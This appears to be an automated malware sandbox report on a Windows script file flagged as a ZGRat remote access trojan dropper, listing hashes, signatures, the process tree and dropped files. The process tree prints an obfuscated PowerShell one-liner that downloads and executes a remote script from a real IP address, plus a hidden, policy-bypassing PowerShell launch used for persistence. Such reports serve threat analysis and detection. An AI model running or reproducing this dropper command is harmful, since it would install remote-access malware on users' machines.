Resubmissions

25/01/2024, 11:33

240125-nn2hksffbq 10

Analysis

  • max time kernel
    140s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    25/01/2024, 11:33

General

  • Target

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf

  • Size

    144KB

  • MD5

    d98237f1eb423d002ec4431002532420

  • SHA1

    3c03b0e124cf15312a0cf43e1a74a3827b027e29

  • SHA256

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

  • SHA512

    9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f

  • SSDEEP

    3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.81.157.103/96/1.txt

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\hich.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2184

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          615a7b1b6cd63e8be3b318138ff66688

          SHA1

          f0fb5b11ff93a7448a158b2345737fd336c6893d

          SHA256

          b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c

          SHA512

          19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp

          Filesize

          7KB

          MD5

          e32cad1ab4c8a3ad44873e572ee4dc01

          SHA1

          d0bf141a980383e56b523ccf0203ae37151ab10f

          SHA256

          ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6

          SHA512

          aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c

        • C:\Users\Public\hich.bat

          Filesize

          195B

          MD5

          6c8a34a94e068b809145df09acbe153c

          SHA1

          0ec5c6964c6ccc949af47297eb9794f8f1ee4724

          SHA256

          c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003

          SHA512

          41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

        • C:\Users\Public\hich.ps1

          Filesize

          370KB

          MD5

          7cc8cf044a1603d177667066b558742b

          SHA1

          822b16d67f89023109a2fb8a091c7949f7fb3bc4

          SHA256

          3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19

          SHA512

          28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175

        • C:\Users\Public\hich.vbs

          Filesize

          686B

          MD5

          741b5b0a474f0e0cd28fd880f68723c0

          SHA1

          4de5489c4e56882514b3ab432048200eae65f90d

          SHA256

          f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23

          SHA512

          3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

        • memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

          Filesize

          9.6MB

        • memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp

          Filesize

          512KB

        • memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp

          Filesize

          512KB

        • memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

          Filesize

          9.6MB

        • memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp

          Filesize

          208KB

        • memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp

          Filesize

          512KB

        • memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

          Filesize

          9.6MB

        • memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

          Filesize

          2.9MB

        • memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp

          Filesize

          512KB

        • memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp

          Filesize

          32KB

        • memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp

          Filesize

          512KB

        • memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp

          Filesize

          512KB

        • memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

          Filesize

          9.6MB

        • memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp

          Filesize

          2.9MB

        • memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

          Filesize

          32KB

        • memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

          Filesize

          9.6MB

        • memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp

          Filesize

          512KB

        • memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp

          Filesize

          512KB

        • memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

          Filesize

          9.6MB